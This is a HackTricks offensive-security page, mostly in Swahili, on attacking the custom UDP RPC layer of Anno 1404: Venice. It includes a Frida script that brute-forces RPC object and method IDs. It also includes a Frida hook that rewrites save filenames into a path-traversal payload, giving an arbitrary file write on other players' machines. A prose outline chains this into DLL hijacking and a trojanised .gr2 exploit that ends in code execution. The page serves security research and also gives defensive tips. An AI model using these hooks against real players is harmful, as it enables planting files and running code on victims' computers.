Uchunguzi wa RPC za UDP Zilizobinafsishwa & Matumizi Mabaya ya Uhamishaji Faili

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Angalia mpango wa usajili!

Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.

Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

Kuchora ramani ya vitu vya RPC vinavyomilikiwa kwa Frida

Vichezo vya zamani vya multiplayer mara nyingi hujenga stack zao za RPC juu ya UDP. Katika Anno 1404: Venice hii imewekwa ndani ya NetComEngine3.dll kupitia dispatcher RMC_CallMessage, ambayo inachambua 5 field kutoka kila datagram:

Sehemu	Madhumuni
`ID`	RPC verb (16-bit)
`Flags`	Transport modifiers (reliability, ordering)
`Source`	Object ID of the caller
`TargetObject`	Remote object instance
`Method`	Method index inside the target class

Kazi mbili za msaada – ClassToMethodName() na TargetName() – zinatafsiri raw IDs kuwa nyuzi za maandishi zinazoweza kusomwa na binadamu kwa ajili ya logging. Kwa brute-forcing 24‑bit object IDs na 16‑bit method IDs na kuwaita helpers hao tunaweza kuorodhesha uso mzima unaofikika kwa mbali bila traffic captures au symbol leaks.

Frida surface enumerator (trimmed)

```javascript 'use strict';

const classToMethod = Module.getExportByName(‘NetComEngine3.dll’, ‘ClassToMethodName’); const targetName = Module.getExportByName(‘NetComEngine3.dll’, ‘TargetName’);

function tryID(objID, methodID) { const method = new NativeFunction(classToMethod, ‘pointer’, [‘pointer’, ‘uint’]); const target = new NativeFunction(targetName, ‘pointer’, [‘pointer’]); const buf = Memory.alloc(Process.pointerSize); buf.writeU32(objID); const m = method(buf, methodID); if (!m.isNull()) { const t = target(buf); console.log(objID.toString(16), ‘=’, t.readUtf16String()); console.log(’ -’, methodID, ‘=’, m.readUtf16String()); } }

for (let obj = 0; obj < 0x9000000; obj += 0x400000) { for (let meth = 0; meth < 0x40; meth++) { tryID(obj, meth); } }

</details>

Kuendesha `frida -l explore-surface.js Addon.exe` kulitoa ramani kamili ya RPC, ikiwemo kitu `Player` (`0x7400000`) na vitenzi vyake vya uhamishaji faili `OnSendFileInit`, `OnSendFileData`, `OnReceivedFileData`, na `OnCancelSendFile`. Mchakato ule ule unatumika kwa binary protocol yoyote inayofichua internal reflection helpers: intercept the dispatcher, brute-force IDs, na log kile engine inachokijua kuhusu kila callable method.

### Tips

- Tumia buffer za logging za engine (`WString::Format` katika kesi hii) ili kuepuka kuandika tena undocumented string encodings.
- Dump `Flags` ili kubaini reliability features (ACK, resend requests) kabla ya kujaribu fuzzing; custom UDP stacks mara nyingi huangusha malformed packets bila onyo.
- Hifadhi ramani iliyoorodheshwa – inafanya kazi kama fuzzing corpus na inaonyesha wazi ni object zipi zinazosimamia filesystem, world state, au in-game scripting.

## Kuiba RPCs za uhamishaji faili

Multiplayer save synchronization ilitumia handshake ya packets mbili:

1. `OnSendFileInit` — hubeba filename ya UTF‑16 ambayo client inapaswa kutumia wakati wa kuhifadhi payload inayoingia.
2. `OnSendFileData` — inatiririsha muundo wa faili ghafi katika chunks za ukubwa fasta.

Kwa sababu server inaleta serialization ya filename kupitia `ByteStreamWriteString()` kabla kabisa ya kutuma, Frida hook inaweza kubadilisha pointer kuelekea traversal payload wakati inahifadhi packet sizes zilizo sawia.

<details>
<summary>Mbadalishaji wa jina la faili</summary>
```javascript
const writeStr = ptr('0x1003A250');
const ByteStreamWriteString = new NativeFunction(writeStr, 'pointer', ['pointer', 'pointer']);
const evil = Memory.allocUtf16String('..\\..\\..\\..\\Sauvegarde.sww');

Interceptor.attach(writeStr, {
onEnter(args) {
const src = args[1].readPointer();
const value = src.readUtf16String();
if (value && value.indexOf('Sauvegarde.sww') !== -1) {
args[1].writePointer(evil);
}
}
});

Wateja wa waathiriwa hawakufanya ukaguzi wowote na waliandika save waliopokelea kwenye njia yoyote ile iliyopewa na mwenyeji mwenye uhasama, kwa mfano kuangusha ndani ya C:\User\user badala ya mti uliokusudiwa wa ...\Savegames\MPShare. Katika ufungaji wa Windows wa Anno 1404 saraka ya mchezo inaweza kuandikwa na kila mtu (world-writable), kwa hivyo traversal inakuwa mara moja primitive ya arbitrary file write:

Drop DLLs for classic search-order hijacking on next launch, or
Overwrite asset archives (RDA files) so that weaponized models, textures, or scripts are loaded live during the same session.

Kutetea / kushambulia malengo mengine

Tafuta RPC verbs zilizopewa majina SendFile, Upload, ShareSave, n.k., kisha intercept serialization helper anayehusika na majina ya faili au saraka za lengo.
Hata kama majina ya faili yanakaguliwa kwa urefu, stack nyingi husahau ku-canonicalize ..\ au mchanganyiko wa / vs \ ; fanya brute-force kwa separators zote.
Wakati mpokeaji anahifadhi faili chini ya game install path, angalia ACLs kupitia icacls ili kuthibitisha kama mtumiaji asiye na ruhusa anaweza kuacha code hapo.

Kugeuza path traversal into live asset execution

Mara tu unaweza kupakia arbitrary bytes, badilisha asset yoyote inayopakuliwa mara kwa mara:

Unpack the archive. RDA archives ni DEFLATE-based containers ambazo metadata yao inaweza kukanushwa kwa XOR (XOR-obfuscated) kwa kutumia stream zilizoanzishwa na srand(0xA2C2A). Zana kama RDAExplorer huripakisha tena archives baada ya mabadiliko.
Inject a malicious .gr2. Faili ya Granny 3D iliyotrojanishwa ina relocation exploit inayofuta SectionContentArray na, kupitia mfululizo wa relocation wa hatua mbili, hupata arbitrary 4-byte write ndani ya granny2.dll.
Hijack allocator callbacks. Kwa ASLR disabled na DEP off, kubadilisha function pointers za malloc/free ndani ya granny2.dll kunarekebisha allocation ijayo kwenda kwa shellcode yako, na kutoa RCE mara moja bila kusubiri waathiriwa kuanzisha mchezo tena.

Mfumo huu unatumika kwa kichwa chochote kinachotiririsha assets zilizo na muundo kutoka kwa binary archives: changanya RPC-level traversal kwa utoaji na unsafe relocation processing kwa ajili ya code execution.

References

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Angalia mpango wa usajili!

Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.

Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.